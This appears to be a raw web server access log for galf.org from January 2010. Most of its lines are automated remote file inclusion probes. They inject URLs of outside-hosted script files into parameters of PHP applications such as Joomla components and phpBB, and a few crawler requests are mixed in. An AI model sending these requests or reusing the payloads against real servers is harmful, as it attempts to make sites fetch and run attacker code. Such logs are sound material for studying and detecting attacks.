125.141.91.138 - - [11/Jan/2010:05:18:14 -0800] "GET /logs//includes/db_adodb.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:05:18:15 -0800] "GET /logs/access_090720.log%20%20//includes/db_adodb.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:05:18:15 -0800] "GET /logs//includes/db_adodb.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:05:18:15 -0800] "GET /includes/db_adodb.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:05:20:58 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.191.225.96 - - [11/Jan/2010:05:21:00 -0800] "GET /appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.207.118 - - [11/Jan/2010:05:25:03 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
208.109.184.46 - - [11/Jan/2010:05:25:05 -0800] "GET /logs/dir_ws=http://natterer-lindau.de//administrator/components/crespon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.109.184.46 - - [11/Jan/2010:05:25:05 -0800] "GET /logs/scripts.log/dir_ws=http://natterer-lindau.de//administrator/components/crespon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.109.184.46 - - [11/Jan/2010:05:25:05 -0800] "GET /dir_ws=http://natterer-lindau.de//administrator/components/crespon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.109.184.46 - - [11/Jan/2010:05:25:10 -0800] "GET /dir_ws=http://natterer-lindau.de//administrator/components/crespon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.109.184.46 - - [11/Jan/2010:05:25:10 -0800] "GET /logs/dir_ws=http://natterer-lindau.de//administrator/components/crespon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.109.184.46 - - [11/Jan/2010:05:25:10 -0800] "GET /logs/scripts.log/dir_ws=http://natterer-lindau.de//administrator/components/crespon1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.125.182.7 - - [11/Jan/2010:05:27:10 -0800] "GET /logs/step_one.php?server_inc=http://flez.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
94.125.182.7 - - [11/Jan/2010:05:27:10 -0800] "GET /step_one.php?server_inc=http://flez.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
65.55.207.118 - - [11/Jan/2010:05:28:08 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:05:28:17 -0800] "GET /logs/access_090615.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:05:28:17 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:05:28:17 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.125.182.7 - - [11/Jan/2010:05:28:24 -0800] "GET /logs/access_090921.log/step_one.php?server_inc=http://flez.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
174.120.14.42 - - [11/Jan/2010:05:28:24 -0800] "GET /logs/access_090720.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.125.182.7 - - [11/Jan/2010:05:28:24 -0800] "GET /logs/access_090629.log/step_one.php?server_inc=http://flez.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
86.109.170.73 - - [11/Jan/2010:05:29:39 -0800] "GET /logs/scripts.log/dir_ws=http://al-haqq.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.170.73 - - [11/Jan/2010:05:29:39 -0800] "GET /dir_ws=http://al-haqq.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.170.73 - - [11/Jan/2010:05:29:39 -0800] "GET /logs/dir_ws=http://al-haqq.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.96 - - [11/Jan/2010:05:32:08 -0800] "GET /logs/ HTTP/1.1" 200 4799 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:05:38:37 -0800] "GET /logs/access_090803.log///zipndownload.php?PP_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:05:38:37 -0800] "GET //zipndownload.php?PP_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:05:38:37 -0800] "GET /logs///zipndownload.php?PP_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:05:39:33 -0800] "GET /logs/access.log%20%20///zipndownload.php?PP_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.222.82 - - [11/Jan/2010:05:39:43 -0800] "GET /logs/access_090803.log%20%20///zipndownload.php?PP_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [11/Jan/2010:05:40:55 -0800] "GET /logs/access_081006.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
90.176.234.205 - - [11/Jan/2010:05:50:08 -0800] "GET /logs/access_090525.log///?g4_path=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [11/Jan/2010:05:50:08 -0800] "GET //?g4_path=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [11/Jan/2010:05:50:08 -0800] "GET /logs///?g4_path=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
90.176.234.205 - - [11/Jan/2010:05:50:27 -0800] "GET /logs/access_090629.log///?g4_path=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [11/Jan/2010:05:54:10 -0800] "GET /logs/access_091012.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://avrovulcan.com/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [11/Jan/2010:05:54:10 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://avrovulcan.com/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [11/Jan/2010:05:54:10 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://avrovulcan.com/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:02:51 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:02:51 -0800] "GET /logs/access_090622.log//?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:02:51 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:02:51 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:02:59 -0800] "GET /logs/access_091214.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:02:59 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:06:02:59 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [11/Jan/2010:06:06:18 -0800] "GET /logs/access_090810.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://avrovulcan.com/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [11/Jan/2010:06:07:25 -0800] "GET /logs/access_091012.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://avrovulcan.com/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.102 - - [11/Jan/2010:06:07:28 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.207.102 - - [11/Jan/2010:06:08:40 -0800] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:12:20 -0800] "GET /logs/access_091221.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:12:20 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:12:20 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:12:24 -0800] "GET /logs/access_091221.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:12:24 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:12:24 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:12:36 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:12:41 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [11/Jan/2010:06:12:50 -0800] "GET /?commonpath=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [11/Jan/2010:06:16:42 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://avrovulcan.com/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:19:33 -0800] "GET /logs/access_091221.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:19:33 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:19:33 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:19:34 -0800] "GET /logs/access_091221.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:19:34 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:19:34 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:19:49 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [11/Jan/2010:06:19:52 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.48.154 - - [11/Jan/2010:06:19:58 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://bdautosales.com/images/builders/build.url?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:20:33 -0800] "GET /logs/access_091102.log//modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:20:33 -0800] "GET /modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:20:33 -0800] "GET /logs//modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:20:40 -0800] "GET /modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:20:40 -0800] "GET /logs//modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:20:40 -0800] "GET /logs/access_091102.log//modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:20:42 -0800] "GET /modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:21:33 -0800] "GET /bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.34.235.197 - - [11/Jan/2010:06:21:34 -0800] "GET /logs//bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.34.235.197 - - [11/Jan/2010:06:21:34 -0800] "GET /logs/access.log%20%20//bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.34.235.197 - - [11/Jan/2010:06:22:46 -0800] "GET /logs/access_091130.log/bbs/skin/gallery/setup.php?dir=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:22:46 -0800] "GET /logs/bbs/skin/gallery/setup.php?dir=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:22:46 -0800] "GET /bbs/skin/gallery/setup.php?dir=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:23:01 -0800] "GET /bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:23:02 -0800] "GET /logs/access_100104.log%20%20//bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:23:02 -0800] "GET /logs//bbs/skin/ggambo7002_board/comment.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:23:30 -0800] "GET /logs/access_090831.log//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:23:30 -0800] "GET /logs//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:23:30 -0800] "GET /main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:23:32 -0800] "GET /main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:23:32 -0800] "GET /logs//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:23:32 -0800] "GET /logs/access_090831.log//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:23:36 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:23:44 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.48.154 - - [11/Jan/2010:06:24:03 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://bdautosales.com/images/builders/build.url?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
72.34.235.197 - - [11/Jan/2010:06:24:29 -0800] "GET /logs/access_091221.log/bbs/skin/gallery/setup.php?dir=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:25:22 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.48.154 - - [11/Jan/2010:06:25:22 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://bdautosales.com/images/builders/build.url?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:25:22 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:27:04 -0800] "GET /logs/access_091116.log%20%20///includes/functions_portal.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:27:04 -0800] "GET /logs/access_090824.log%20%20///includes/functions_portal.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:27:04 -0800] "GET /logs///includes/functions_portal.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:27:05 -0800] "GET //includes/functions_portal.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:27:21 -0800] "GET /logs/access_091116.log///includes/functions_portal.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:06:27:22 -0800] "GET /logs/access_090824.log///includes/functions_portal.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.12.40 - - [11/Jan/2010:06:28:13 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.12.40 - - [11/Jan/2010:06:28:13 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.208.12.40 - - [11/Jan/2010:06:28:13 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:28:34 -0800] "GET /logs/access_091207.log%20%20//bbs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:28:35 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:28:35 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:28:45 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:28:45 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:28:45 -0800] "GET /logs/access_091207.log%20%20//bbs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:29:58 -0800] "GET /logs/access_090629.log%20%20//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.93.165.28 - - [11/Jan/2010:06:30:54 -0800] "GET /logs//modules/xgallery/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.93.165.28 - - [11/Jan/2010:06:30:54 -0800] "GET /modules/xgallery/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.93.165.28 - - [11/Jan/2010:06:30:54 -0800] "GET /logs/access.log//modules/xgallery/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.93.165.28 - - [11/Jan/2010:06:31:07 -0800] "GET /logs/access.log//modules/xgallery/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:32:06 -0800] "GET /logs/access_090629.log%20%20//main.php?sayfa=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:06:33:27 -0800] "GET /logs/access_090706.log%20%20//modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [11/Jan/2010:06:33:30 -0800] "GET /logs/access_091207.log//bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [11/Jan/2010:06:33:30 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.45.62 - - [11/Jan/2010:06:33:30 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
